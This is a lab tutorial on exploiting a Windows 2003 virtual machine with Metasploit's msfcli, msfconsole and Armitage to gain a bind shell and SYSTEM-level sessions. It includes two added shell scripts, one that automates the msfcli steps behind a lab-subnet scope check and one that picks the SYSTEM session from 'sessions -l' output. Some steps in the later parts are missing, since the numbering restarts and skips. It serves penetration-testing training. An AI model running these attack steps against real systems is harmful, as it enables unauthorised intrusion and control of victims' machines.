Step-by-step procedure
PART A: Using Metasploit msfcli
1. Turn on both VMs and check the victim's IP address. In a real engagement you would have found this during the reconnaissance phase.
2. Now go to the attacker machine, open a terminal and change to the /pentest/exploits/framework3 directory. We're going to use the Metasploit command-line interface, msfcli, for this attack.
3. Run msfcli and search for DNS-related exploits for the Windows platform.
4. Now we use the O parameter to list the options of this exploit. Then we set the RHOST option to our target's IP address and use the P parameter to list the payloads that are compatible with the exploit, so we can pick a suitable one.
5. We choose the simple payload generic/shell_bind_tcp in order to get a command prompt on the victim. Before launching anything we ask which targets the exploit supports with the T option, to make sure Windows 2003 is one of them (the list shows what the module can hit, not whether this particular host is still unpatched).
6. Finally we execute the exploit with the E option and voilà! We're in! Enjoy ;)
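The whole of PART A as one script, written in the shell you would type it into. This is an added example, not code from the original article or from Metasploit itself. It assumes the BackTrack layout named in step 2 (/pentest/exploits/framework3), placeholder lab addresses in LAB_NET and RHOST, and that you set EXPLOIT to the module you picked in step 3 (the page does not name it, so the script refuses to run without it). The one thing it adds to the page's procedure is a scope check: the script will not fire anything at an address outside the lab network, which is the same discipline you apply to an authorised target list on a real engagement.

```shell
#!/bin/sh
# Added example, not code from the original article: the msfcli sequence of
# PART A as a script, with a scope check so nothing is fired at a host outside
# the lab network. Assumptions (not stated on the page): the framework lives in
# /pentest/exploits/framework3 (step 2), LAB_NET and RHOST are placeholder lab
# addresses, and EXPLOIT is the module chosen in step 3.

MSF_DIR=/pentest/exploits/framework3
LAB_NET="${LAB_NET:-192.168.56.0/24}"   # assumed lab range; the only one we may touch
RHOST="${RHOST:-192.168.56.102}"        # assumed victim IP from step 1
PAYLOAD=generic/shell_bind_tcp          # payload chosen in step 5
EXPLOIT="${EXPLOIT:-}"                  # module name from step 3; must be set by hand

# ip_to_int 192.168.56.102 -> 3232249958 (dotted quad as a 32-bit integer)
ip_to_int() {
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# in_scope IP CIDR -> succeeds only if IP falls inside CIDR
in_scope() {
    ip=$(ip_to_int "$1")
    net=$(ip_to_int "${2%/*}")
    bits=${2#*/}
    mask=$(( (4294967295 << (32 - bits)) & 4294967295 ))
    [ $(( ip & mask )) -eq $(( net & mask )) ]
}

# run_part_a -> steps 4 to 6 of PART A, in the order the article does them
run_part_a() {
    [ -n "$EXPLOIT" ] || { echo "EXPLOIT is not set: pick a module as in step 3" >&2; return 2; }
    in_scope "$RHOST" "$LAB_NET" || { echo "$RHOST is outside $LAB_NET, refusing to continue" >&2; return 1; }
    "$MSF_DIR/msfcli" "$EXPLOIT" O                                     # step 4: show options
    "$MSF_DIR/msfcli" "$EXPLOIT" RHOST="$RHOST" P                      # step 4: compatible payloads
    "$MSF_DIR/msfcli" "$EXPLOIT" RHOST="$RHOST" T                      # step 5: supported targets
    "$MSF_DIR/msfcli" "$EXPLOIT" RHOST="$RHOST" PAYLOAD="$PAYLOAD" E   # step 6: execute
}

# Only fire when explicitly asked: EXPLOIT=... sh part_a.sh run
if [ "${1:-}" = run ]; then
    run_part_a
fi
```

The O, P and T invocations are read-only; only the final E line touches the target, which is why the scope check and the EXPLOIT check sit before all of them rather than just before the last one.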
2. msfconsole has a useful help command that we can use to explore all the commands available.
3. We can use the show exploits command to look for the one we want.
2. After clicking the Start MSF button we will see Armitage's interface.
3. Since we have already run an attack against this target, Armitage should show the victim in its host list, so we select it with a single click. Then we expand the exploit -> windows -> dcerpc menu on the left, find the exploit we used before and double-click it.
4. Be sure to tick the use reverse connection checkbox and click the Launch button.
6. Now we list the available sessions and connect to the right one. Keep in mind that we hold the privileges of the SYSTEM user, as Armitage reported earlier. To list the sessions we use the command sessions -l.
7. To interact with a session we use sessions -i #, where # is the number of the session we want.
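Steps 6 and 7 are done by eye in the article: read the table, spot the session, type its number. When several sessions are open it is worth keying on the privilege level shown in the Information column, which is where the SYSTEM user mentioned in step 6 appears. The following is an added example, not code from the original article or from Metasploit: a small shell helper that picks the first session running as NT AUTHORITY\SYSTEM out of the text that sessions -l prints. SAMPLE_SESSIONS is constructed here in the column layout msfconsole 4.x uses; the addresses and the WIN2003 hostname are invented placeholders.

```shell
#!/bin/sh
# Added example, not code from the original article: choose which session to
# attach to (step 7) from the table that "sessions -l" prints (step 6), keying
# on the SYSTEM privilege level the article says Armitage reported.
# SAMPLE_SESSIONS is constructed here in the layout msfconsole 4.x uses; the
# addresses and hostname are invented placeholders.

SAMPLE_SESSIONS='Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   shell windows                                         192.168.56.1:4444 -> 192.168.56.102:1037
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2003  192.168.56.1:4445 -> 192.168.56.102:1041'

# system_session_id TABLE -> prints the Id of the first session running as
# NT AUTHORITY\SYSTEM and succeeds; prints nothing and fails if there is none.
# Session rows are the lines that start with a number; header, separator and
# "No active sessions." lines never match.
system_session_id() {
    printf '%s\n' "$1" | awk '
        /^ *[0-9]+ / && /NT AUTHORITY\\SYSTEM/ { print $1; found = 1; exit }
        END { exit !found }'
}

# Usage: build the exact command from step 7 for the SYSTEM session.
if id=$(system_session_id "$SAMPLE_SESSIONS"); then
    echo "sessions -i $id"      # -> sessions -i 2
else
    echo "no SYSTEM session yet; run the exploit again" >&2
fi
```

The helper deliberately fails when nothing matches rather than falling back to the first session, so a script built on it cannot silently attach to a low-privilege shell and carry on as if it were SYSTEM.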
Copyright 2012 Elixircorp S.A. Legal Note: All the brands and applications used in this article belong to their respective owners.